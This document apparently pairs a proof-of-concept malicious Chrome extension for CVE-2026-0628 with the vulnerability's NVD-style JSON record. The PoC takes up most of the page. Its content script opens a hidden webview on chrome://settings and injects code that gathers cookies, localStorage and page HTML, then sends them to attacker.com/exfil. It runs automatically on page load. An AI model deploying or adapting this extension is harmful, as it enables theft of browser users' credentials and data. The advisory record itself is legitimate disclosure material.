CVE-2026-0628

// CVE-2026-0628 PoC - Malicious Chrome Extension // This PoC demonstrates the WebView tag policy enforcement vulnerability // manifest.json { "manifest_version": 3, "name": "CVE-2026-0628 PoC Extension", "version": "1.0", "permissions": ["activeTab", "scripting"], "action": { "default_popup": "popup.html" }, "content_scripts": [{ "matches": ["<all_urls>"], "js": ["content.js"] }] } // content.js - Inject malicious content via WebView function exploitWebViewVulnerability() { // Create a WebView element to bypass SOP const webview = document.createElement('webview'); webview.setAttribute('partition', 'trusted'); webview.style.display = 'none'; document.body.appendChild(webview); // Target privileged page const targetUrl = 'chrome://settings'; webview.addEventListener('loadstop', function() { // Attempt to inject script into privileged context webview.executeScript({ code: ` // Steal sensitive data from privileged page const sensitiveData = { cookies: document.cookie, storage: localStorage, settings: document.body.innerHTML }; // Send data to attacker-controlled server fetch('https://attacker.com/exfil', { method: 'POST', body: JSON.stringify(sensitiveData) }); ` }); }); webview.src = targetUrl; } // Trigger exploitation document.addEventListener('DOMContentLoaded', exploitWebViewVulnerability); // popup.html /* <!DOCTYPE html> <html> <body> <h1>Extension Installed</h1> <p>Click to activate exploit</p> <button onclick="chrome.runtime.sendMessage({action: 'exploit'})"> Activate </button> </body> </html> */

{"cve": {"id": "CVE-2026-0628", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:07.093", "lastModified": "2026-01-12T16:48:33.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient policy enforcement in WebView tag in Google Chrome prior to 143.0.7499.192 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: High)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.192", "matchCriteriaId": "D3CA58B4-E298-4CAF-91FC-6570689DC687"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://issues.chromium.org/issues/463155954", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}